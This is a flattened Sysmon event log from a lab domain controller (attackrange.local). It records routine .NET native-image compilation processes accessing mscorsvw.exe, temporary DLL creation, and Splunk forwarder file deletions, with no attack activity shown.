21:05:05.942{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021337Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.926{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.926{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-4404-00000000CF01}5048C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.849{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4304-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000021334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.833{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A0047A3D92CC9D003B173BD0EB65125,SHA256=88FE885D0CB3A534F1A7843CC47489E26431E0BA8A0F1098B361D5A31973EF60,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.833{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4304-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.833{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-4304-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:05.708{4DB9351A-A201-60D3-4204-00000000CF01}6688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a20-0\PresentationFramework.Aero.dll2021-06-23 21:05:05.708 10341000x800000000000000021330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.411{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4204-00000000CF01}6688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.395{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4204-00000000CF01}6688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021328Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.395{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-4204-00000000CF01}6688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021327Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.333{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4104-00000000CF01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021326Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.317{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4104-00000000CF01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021325Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.317{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-4104-00000000CF01}4704C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021324Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=060FF845EFAB055A562BE4FF73C4FF73,SHA256=74D85300AFF260236AF9387D4B02A55701D45451BC25FF4264212CA287375D00,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021323Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:05.255{4DB9351A-A201-60D3-4004-00000000CF01}5112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13f8-0\PresentationFramework-SystemXmlLinq.dll2021-06-23 21:05:05.255 10341000x800000000000000021322Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.223{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-4004-00000000CF01}5112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021321Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.208{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-4004-00000000CF01}5112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021320Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.208{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-4004-00000000CF01}5112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021319Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.161{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-3F04-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021318Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.145{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-3F04-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021317Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.145{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-3F04-00000000CF01}3128C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021316Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:05.083{4DB9351A-A201-60D3-3E04-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a48-0\PresentationFramework-SystemXml.dll2021-06-23 21:05:05.083 10341000x800000000000000021315Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.005{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A201-60D3-3E04-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021314Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.005{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A201-60D3-3E04-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021313Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:05.005{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A201-60D3-3E04-00000000CF01}2632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:06.911{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A01FA9BEE07AC6FA3C96B5C9C0FFB700,SHA256=02A556AE464EF0247350101505D2FA9F2E2DA85B4C095E2ECE0739592CBCA1DD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 